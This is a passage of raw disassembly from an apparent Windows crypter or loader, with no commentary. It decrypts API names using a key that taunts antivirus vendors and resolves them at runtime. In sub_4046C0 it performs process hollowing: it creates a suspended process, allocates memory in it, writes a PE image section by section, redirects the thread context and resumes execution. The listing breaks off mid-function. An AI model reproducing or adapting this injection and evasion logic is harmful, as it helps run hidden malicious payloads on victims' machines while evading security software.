loc_403F05: ; DATA XREF: sub_403EE0+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_403F04
; ---------------------------------------------------------------------------
loc_403F0C: ; CODE XREF: sub_403EE0:loc_403F04�j
; DATA XREF: sub_403EE0+1F�o
pop ebp
retn
sub_403EE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403F10 proc near ; DATA XREF: CODE:00405288�o
sub ds:dword_407664, 1
retn
sub_403F10 endp
; =============== S U B R O U T I N E =======================================
sub_403F18 proc near ; CODE XREF: sub_403F24+2D�p
; sub_4040B4+31�p ...
test eax, eax
jz short locret_403F21
sub eax, 4
mov eax, [eax]
locret_403F21: ; CODE XREF: sub_403F18+2�j
retn
sub_403F18 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F24 proc near ; CODE XREF: CODE:004053C2�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_4037EC
xor eax, eax
push ebp
push offset loc_404046
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_4]
call sub_403F18
mov ebx, eax
cmp ebx, 4
jbe loc_40401C
lea eax, [ebp+arg_4]
call sub_40384C
mov edi, eax
mov edx, [edi]
mov eax, esi
call sub_403854
cmp dword ptr [edi], 80000h
jbe short loc_403F85
mov [ebp+var_8], 2
jmp short loc_403F8C
; ---------------------------------------------------------------------------
loc_403F85: ; CODE XREF: sub_403F24+56�j
mov [ebp+var_8], 102h
loc_403F8C: ; CODE XREF: sub_403F24+5F�j
lea ecx, [ebp+var_C]
mov edx, offset aIam1337rofl@av ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_40408C
call sub_403E78
mov eax, [ebp+var_C]
call sub_4037FC
push eax
call sub_403CD4 ; LoadLibraryA
mov ds:dword_407670, eax
lea ecx, [ebp+var_10]
mov edx, offset aIam1337rofl@av ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_4040A0
call sub_403E78
mov eax, [ebp+var_10]
call sub_4037FC
push eax
mov eax, ds:dword_407670
push eax
call sub_403CCC ; GetProcAddress
mov ds:dword_40766C, eax
lea eax, [ebp+var_4]
push eax
sub ebx, 4
push ebx
lea eax, [ebp+arg_4]
call sub_40384C
add eax, 4
push eax
mov eax, [edi]
push eax
mov eax, esi
call sub_40384C
push eax
mov eax, [ebp+var_8]
push eax
call ds:dword_40766C
mov eax, ds:dword_407670
push eax
call sub_403CC4 ; FreeLibrary
mov eax, esi
mov edx, [ebp+var_4]
call sub_403854
jmp short loc_404023
; ---------------------------------------------------------------------------
loc_40401C: ; CODE XREF: sub_403F24+37�j
mov eax, esi
call sub_403560
loc_404023: ; CODE XREF: sub_403F24+F6�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40404D
loc_404030: ; CODE XREF: sub_403F24+127�j
lea eax, [ebp+var_10]
mov edx, 2
call sub_403584
lea eax, [ebp+arg_4]
call sub_403560
retn
; ---------------------------------------------------------------------------
loc_404046: ; DATA XREF: sub_403F24+1F�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404030
; ---------------------------------------------------------------------------
loc_40404D: ; CODE XREF: sub_403F24+121�j
; DATA XREF: sub_403F24+107�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_403F24 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 21h
aIam1337rofl@av db 'IAM1337ROFL@AVsESPECIALLYSYMANTEC',0 ; DATA XREF: sub_403F24+6B�o
; sub_403F24+90�o
align 4
dd 0FFFFFFFFh, 9
dword_40408C dd 0F3422875h, 0A8D8A8E5h, 50h, 0FFFFFFFFh, 13hdword_4040A0 dd 0DB4A2849h, 0A9D3E5ECh, 0DF10004Ch, 0D69BFED5h, 0E27227h
; DATA XREF: sub_403F24+95�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040B4 proc near ; CODE XREF: CODE:004053CF�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
xor eax, eax
mov [ebp+var_C], eax
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_4037EC
xor eax, eax
push ebp
push offset loc_404177
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_403560
mov eax, [ebp+arg_4]
call sub_403F18
mov [ebp+var_8], eax
mov ebx, 1
cmp ebx, [ebp+var_8]
ja short loc_404159
loc_4040F7: ; CODE XREF: sub_4040B4+A3�j
mov eax, [ebp+arg_4]
mov al, [eax+ebx-1]
test al, al
jnz short loc_40413A
mov eax, [ebp+arg_4]
mov al, [eax+ebx]
mov [ebp+var_1], al
mov eax, [esi]
call sub_403F18
mov edi, eax
xor edx, edx
mov dl, [ebp+var_1]
add edx, edi
mov eax, esi
call sub_403854
mov eax, esi
call sub_40384C
add eax, edi
xor edx, edx
mov dl, [ebp+var_1]
xor ecx, ecx
call sub_402B44
inc ebx
jmp short loc_404153
; ---------------------------------------------------------------------------
loc_40413A: ; CODE XREF: sub_4040B4+4C�j
lea eax, [ebp+var_C]
mov edx, [ebp+arg_4]
mov dl, [edx+ebx-1]
call sub_403654
mov edx, [ebp+var_C]
mov eax, esi
call sub_403690
loc_404153: ; CODE XREF: sub_4040B4+84�j
inc ebx
cmp ebx, [ebp+var_8]
jbe short loc_4040F7
loc_404159: ; CODE XREF: sub_4040B4+41�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40417E
loc_404166: ; CODE XREF: sub_4040B4+C8�j
lea eax, [ebp+var_C]
call sub_403560
lea eax, [ebp+arg_4]
call sub_403560
retn
; ---------------------------------------------------------------------------
loc_404177: ; DATA XREF: sub_4040B4+1C�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404166
; ---------------------------------------------------------------------------
loc_40417E: ; CODE XREF: sub_4040B4+C2�j
; DATA XREF: sub_4040B4+AD�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_4040B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404188 proc near ; DATA XREF: CODE:00405294�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4041AD
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407668
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4041B4
loc_4041AC: ; CODE XREF: sub_404188+2A�j
retn
; ---------------------------------------------------------------------------
loc_4041AD: ; DATA XREF: sub_404188+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_4041AC
; ---------------------------------------------------------------------------
loc_4041B4: ; CODE XREF: sub_404188:loc_4041AC�j
; DATA XREF: sub_404188+1F�o
pop ebp
retn
sub_404188 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4041B8 proc near ; DATA XREF: CODE:00405290�o
sub ds:dword_407668, 1
retn
sub_4041B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041C0 proc near ; CODE XREF: sub_4046C0+33�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 8
loc_4041C8: ; CODE XREF: sub_4041C0+D�j
push 0
push 0
dec ecx
jnz short loc_4041C8
push ebx
push esi
mov esi, offset dword_407690
xor eax, eax
push ebp
push offset loc_40441F
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_8]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404460
call sub_403E78
mov eax, [ebp+var_8]
call sub_4037FC
push eax
call sub_403CD4 ; LoadLibraryA
mov ebx, eax
lea ecx, [ebp+var_C]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404478
call sub_403E78
mov eax, [ebp+var_C]
call sub_4037FC
push eax
call sub_403CD4 ; LoadLibraryA
mov [ebp+var_4], eax
lea ecx, [ebp+var_10]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_40448C
call sub_403E78
mov eax, [ebp+var_10]
call sub_4037FC
push eax
push ebx
call sub_403CCC ; GetProcAddress
mov [esi], eax
lea ecx, [ebp+var_14]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_4044A4
call sub_403E78
mov eax, [ebp+var_14]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_407694, eax
lea ecx, [ebp+var_18]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_4044C0
call sub_403E78
mov eax, [ebp+var_18]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_407674, eax
lea ecx, [ebp+var_1C]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_4044D8
call sub_403E78
mov eax, [ebp+var_1C]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_407678, eax
lea ecx, [ebp+var_20]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset loc_4044F4
call sub_403E78
mov eax, [ebp+var_20]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_407680, eax
lea ecx, [ebp+var_24]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404510
call sub_403E78
mov eax, [ebp+var_24]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_407684, eax
lea ecx, [ebp+var_28]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_40452C
call sub_403E78
mov eax, [ebp+var_28]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_407688, eax
lea ecx, [ebp+var_2C]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404544
call sub_403E78
mov eax, [ebp+var_2C]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_40769C, eax
lea ecx, [ebp+var_30]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404558
call sub_403E78
mov eax, [ebp+var_30]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_40768C, eax
lea ecx, [ebp+var_34]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404574
call sub_403E78
mov eax, [ebp+var_34]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_40767C, eax
lea ecx, [ebp+var_38]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_40458C
call sub_403E78
mov eax, [ebp+var_38]
call sub_4037FC
push eax
mov eax, [ebp+var_4]
push eax
call dword ptr [esi]
mov ds:dword_407698, eax
lea ecx, [ebp+var_3C]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_4045AC
call sub_403E78
mov eax, [ebp+var_3C]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4076A0, eax
mov eax, offset dword_4044D8
lea ecx, [ebp+var_40]
mov edx, offset aIam1337rofl@_0 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
call sub_403E78
mov eax, [ebp+var_40]
call sub_4037FC
push eax
push ebx
call dword ptr [esi]
mov ds:dword_407678, eax
push ebx
call ds:dword_40769C ; FreeLibrary
mov eax, [ebp+var_4]
push eax
call ds:dword_40769C ; FreeLibrary
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404426
loc_404411: ; CODE XREF: sub_4041C0+264�j
lea eax, [ebp+var_40]
mov edx, 0Fh
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_40441F: ; DATA XREF: sub_4041C0+19�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404411
; ---------------------------------------------------------------------------
loc_404426: ; CODE XREF: sub_4041C0+25E�j
; DATA XREF: sub_4041C0+24C�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4041C0 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 21h
aIam1337rofl@_0 db 'IAM1337ROFL@AVsESPECIALLYSYMANTEC',0 ; DATA XREF: sub_4041C0+27�o
; sub_4041C0+49�o ...
align 4
dd 0FFFFFFFFh, 0Ch
dword_404460 dd 0F1543970h, 0F68FEAECh, 0C0191612h, 0 dd 0FFFFFFFFh, 9
dword_404478 dd 0F3422875h, 0A8D8A8E5h, 50h, 0FFFFFFFFh, 0Ehdword_40448C dd 0CF52395Ch, 85DFE9FBh, 0C9071658h, 0CFD5h, 0FFFFFFFFh
; DATA XREF: sub_4041C0+71�o
dd 10h
dword_4044A4 dd 0EB54354Dh, 94D0E7FCh, 0C9011D4Eh, 0C8ABC8C5h, 0
; DATA XREF: sub_4041C0+94�o
dd 0FFFFFFFFh, 0Ch
dword_4044C0 dd 0EA553949h, 0ACE8E3E4h, 0C814174Eh, 0 dd 0FFFFFFFFh, 10h
dword_4044D8 dd 0CB523948h, 0A5D9F4E1h, 0C21A3158h, 0C496D9D2h, 0
; DATA XREF: sub_4041C0+DA�o
; sub_4041C0+210�o
dd 0FFFFFFFFh, 11h
; ---------------------------------------------------------------------------
loc_4044F4: ; DATA XREF: sub_4041C0+FD�o
dec ecx
cmp [edi-5], eax
fxtract
shl dword ptr [edi-1EF9FEA7h], cl
retn
; ---------------------------------------------------------------------------
db 0D1h, 81h, 0C2h
dd 38h, 0FFFFFFFFh, 10h
dword_404510 dd 0CB52395Ch, 0A5D9F4E1h, 0C21A3158h, 0C496D9D2h, 0
; DATA XREF: sub_4041C0+120�o
dd 0FFFFFFFFh, 0Eh
dword_40452C dd 0FE432E58h, 0B6ECE3FDh, 0DF101153h, 0FDD5h, 0FFFFFFFFh
; DATA XREF: sub_4041C0+143�o
dd 0Bh
dword_404544 dd 0FA432E5Dh, 0B6DEEFC5h, 0C005Dh, 0FFFFFFFFh, 12h
; DATA XREF: sub_4041C0+166�o
dword_404558 dd 0EB4F2E4Ch, 0ABCED6ECh, 0DF06175Fh, 0DF83D9EBh, 6E33h
; DATA XREF: sub_4041C0+189�o
dd 0FFFFFFFFh, 0Eh
dword_404574 dd 0EB54354Dh, 85D0E7FCh, 0CF1A1E50h, 0C4E3h, 0FFFFFFFFh
; DATA XREF: sub_4041C0+1AC�o
dd 14h
dword_40458C dd 0F1732B41h, 92CCE7E4h, 0E3021755h, 0D38BEFC0h, 0B9FF7E35h
; DATA XREF: sub_4041C0+1CF�o
dd 0
dd 0FFFFFFFFh, 10h
dword_4045AC dd 0F254394Fh, 0B0DDE8E0h, 0C3072259h, 0C39DD9C5h, 0
; DATA XREF: sub_4041C0+1F5�o
; =============== S U B R O U T I N E =======================================
sub_4045C0 proc near ; CODE XREF: sub_404604+28�p
; sub_404604+38�p ...
push ecx
mov edx, esp
call sub_402BD0
pop edx
retn
sub_4045C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4045CC proc near ; CODE XREF: sub_404604+20�p
; sub_404604+30�p ...
var_108 = byte ptr -108h
push ebx
push esi
add esp, 0FFFFFEF4h
mov esi, edx
mov ebx, eax
lea edx, [esp+114h+var_108]
mov eax, ebx
call sub_402BC4
lea edx, [esp+114h+var_108]
mov eax, esp
mov cl, 0Bh
call sub_402B28
mov eax, esi
mov edx, esp
call sub_403664
add esp, 10Ch
pop esi
pop ebx
retn
sub_4045CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404604 proc near ; CODE XREF: sub_40468C+8�p
; sub_4046A4+8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40467E
push dword ptr fs:[eax]
mov fs:[eax], esp
nop
lea edx, [ebp+var_10]
mov eax, ebx
call sub_4045CC
mov eax, [ebp+var_10]
call sub_4045C0
lea edx, [ebp+var_C]
call sub_4045CC
mov eax, [ebp+var_C]
call sub_4045C0
lea edx, [ebp+var_8]
call sub_4045CC
mov eax, [ebp+var_8]
call sub_4045C0
lea edx, [ebp+var_4]
call sub_4045CC
mov eax, [ebp+var_4]
call sub_4045C0
mov ebx, eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404685
loc_404670: ; CODE XREF: sub_404604+7F�j
lea eax, [ebp+var_10]
mov edx, 4
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_40467E: ; DATA XREF: sub_404604+F�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404670
; ---------------------------------------------------------------------------
loc_404685: ; CODE XREF: sub_404604+79�j
; DATA XREF: sub_404604+67�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_404604 endp
; =============== S U B R O U T I N E =======================================
sub_40468C proc near ; CODE XREF: sub_4046C0+195�p
push ebx
mov ebx, eax
mov eax, 7Ch
call sub_404604
lea eax, [ebx+18h]
movzx edx, word ptr [ebx+14h]
add eax, edx
pop ebx
retn
sub_40468C endp
; =============== S U B R O U T I N E =======================================
sub_4046A4 proc near ; CODE XREF: sub_4046C0+1EA�p
push ebx
mov ebx, eax
mov eax, 7Ch
call sub_404604
shr ebx, 1Dh
mov eax, ds:dword_4060A0[ebx*4]
pop ebx
retn
sub_4046A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046C0 proc near ; CODE XREF: CODE:00405408�p
var_148 = dword ptr -148h
var_A4 = dword ptr -0A4h
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_4C = word ptr -4Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEB8h
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
call sub_4037EC
mov eax, [ebp+var_C]
call sub_4037EC
xor eax, eax
push ebp
push offset loc_404987
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_4041C0
xor ebx, ebx
mov eax, 7Ch
call sub_404604
lea eax, [ebp+var_38]
xor ecx, ecx
mov edx, 10h
call sub_402B44
lea eax, [ebp+var_7C]
xor ecx, ecx
mov edx, 44h
call sub_402B44
mov [ebp+var_7C], 44h
xor eax, eax
mov al, [ebp+arg_0]
mov [ebp+var_4C], ax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_7C]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
mov eax, [ebp+var_C]
call sub_4037FC
push eax
mov eax, [ebp+var_8]
call sub_4037FC
push eax
call ds:dword_407688
test eax, eax
jz loc_40496C
mov [ebp+var_21], 1
mov eax, 7Ch
call sub_404604
xor eax, eax
push ebp
push offset loc_404965
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_148], 10002h
lea eax, [ebp+var_148]
push eax
mov eax, [ebp+var_34]
push eax
call ds:dword_407684
test eax, eax
jz loc_40492C
lea eax, [ebp+var_14]
push eax
push 4
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_A4]
add eax, 8
push eax
mov eax, [ebp+var_38]
push eax
call ds:dword_407680
test eax, eax
jz loc_40492C
mov eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
call ds:dword_407698
test eax, eax
jb loc_40492C
cmp [ebp+var_4], 0
jz loc_40492C
mov eax, 7Ch
call sub_404604
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_20], eax
push 4
push 3000h
mov eax, [ebp+var_20]
mov eax, [eax+50h]
push eax
mov eax, [ebp+var_20]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_38]
push eax
call ds:dword_40767C
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40492C
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+var_20]
mov eax, [eax+54h]
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
call ds:dword_40768C
test eax, eax
jz loc_40492C
mov eax, [ebp+var_20]
call sub_40468C
mov esi, eax
mov eax, 7Ch
call sub_404604
mov eax, [ebp+var_20]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb short loc_4048CD
inc eax
mov [ebp+var_28], eax
xor ebx, ebx
loc_404878: ; CODE XREF: sub_4046C0+20B�j
lea eax, [ebp+var_18]
push eax
lea edi, [ebx+ebx*4]
mov eax, [esi+edi*8+10h]
push eax
mov eax, [esi+edi*8+14h]
add eax, [ebp+var_4]
push eax
mov eax, [esi+edi*8+0Ch]
add eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
call ds:dword_40768C
test eax, eax
jz short loc_4048C7
lea eax, [ebp+var_1C]
push eax
mov eax, [esi+edi*8+24h]
call sub_4046A4
push eax
mov eax, [esi+edi*8+8]
push eax
mov eax, [esi+edi*8+0Ch]
add eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
call ds:dword_407694
loc_4048C7: ; CODE XREF: sub_4046C0+1E0�j
inc ebx
dec [ebp+var_28]
jnz short loc_404878
loc_4048CD: ; CODE XREF: sub_4046C0+1B0�j
mov eax, 7Ch
call sub_404604
lea eax, [ebp+var_18]
push eax
push 4
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_A4]
add eax, 8
push eax
mov eax, [ebp+var_38]
push eax
call ds:dword_40768C
test eax, eax
jz short loc_40492C
mov eax, 7Ch
call sub_404604
mov eax, [ebp+var_20]
mov eax, [eax+28h]
add eax, [ebp+var_10]
mov [ebp+var_98], eax
lea eax, [ebp+var_148]
push eax
mov eax, [ebp+var_34]
push eax
call ds:dword_407678
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+var_21], al
loc_40492C: ; CODE XREF: sub_4046C0+DF�j
; sub_4046C0+105�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40496C
loc_404939: ; CODE XREF: sub_4046C0+2AA�j
cmp [ebp+var_21], 0
jnz short loc_40494D
push 0
mov eax, [ebp+var_38]
push eax
call ds:dword_4076A0
jmp short loc_404957
; ---------------------------------------------------------------------------
loc_40494D: ; CODE XREF: sub_4046C0+27D�j
mov eax, [ebp+var_34]
push eax
call ds:dword_407674
loc_404957: ; CODE XREF: sub_4046C0+28B�j
mov eax, 7Ch
call sub_404604
mov bl, [ebp+var_21]
retn
; ---------------------------------------------------------------------------
loc_404965: ; DATA XREF: sub_4046C0+B7�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404939
; ---------------------------------------------------------------------------
loc_40496C: ; CODE XREF: sub_4046C0+A0�j
; DATA XREF: sub_4046C0+274�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40498E
loc_404979: ; CODE XREF: sub_4046C0+2CC�j
lea eax, [ebp+var_C]
mov edx, 2
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_404987: ; DATA XREF: sub_4046C0+28�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404979
; ---------------------------------------------------------------------------
loc_40498E: ; CODE XREF: sub_4046C0+2C6�j
; DATA XREF: sub_4046C0+2B4�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4046C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40499C proc near ; DATA XREF: CODE:0040529C�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4049C1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076A4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4049C8
loc_4049C0: ; CODE XREF: sub_40499C+2A�j
retn
; ---------------------------------------------------------------------------
loc_4049C1: ; DATA XREF: sub_40499C+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_4049C0
; ---------------------------------------------------------------------------
loc_4049C8: ; CODE XREF: sub_40499C:loc_4049C0�j
; DATA XREF: sub_40499C+1F�o
pop ebp
retn
sub_40499C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4049CC proc near ; DATA XREF: CODE:00405298�o
sub ds:dword_4076A4, 1
retn
sub_4049CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4049D4 proc near ; CODE XREF: sub_4049DC+80�p
jmp ds:dword_40812C
sub_4049D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049DC proc near ; CODE XREF: CODE:004052D3�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 6
loc_4049E4: ; CODE XREF: sub_4049DC+D�j
push 0
push 0
dec ecx
jnz short loc_4049E4
push ecx
push ebx
push esi
xor eax, eax
push ebp
push offset loc_404C1E
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_4]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404C60
call sub_403E78
mov eax, [ebp+var_4]
call sub_4037FC
push eax
call sub_403CD4 ; LoadLibraryA
mov ebx, eax
lea ecx, [ebp+var_8]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404C78
call sub_403E78
mov eax, [ebp+var_8]
call sub_4037FC
push eax
call sub_403CD4 ; LoadLibraryA
mov esi, eax
lea ecx, [ebp+var_C]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404C90
call sub_403E78
mov eax, [ebp+var_C]
call sub_4037FC
push eax
push ebx
call sub_4049D4 ; GetProcAddress
mov ds:dword_4076A8, eax
lea ecx, [ebp+var_10]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404CA8
call sub_403E78
mov eax, [ebp+var_10]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076CC, eax
lea ecx, [ebp+var_14]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404CBC
call sub_403E78
mov eax, [ebp+var_14]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076AC, eax
lea ecx, [ebp+var_18]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404CD8
call sub_403E78
mov eax, [ebp+var_18]
call sub_4037FC
push eax
push esi
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076B0, eax
lea ecx, [ebp+var_1C]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404CF0
call sub_403E78
mov eax, [ebp+var_1C]
call sub_4037FC
push eax
push esi
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076B4, eax
lea ecx, [ebp+var_20]
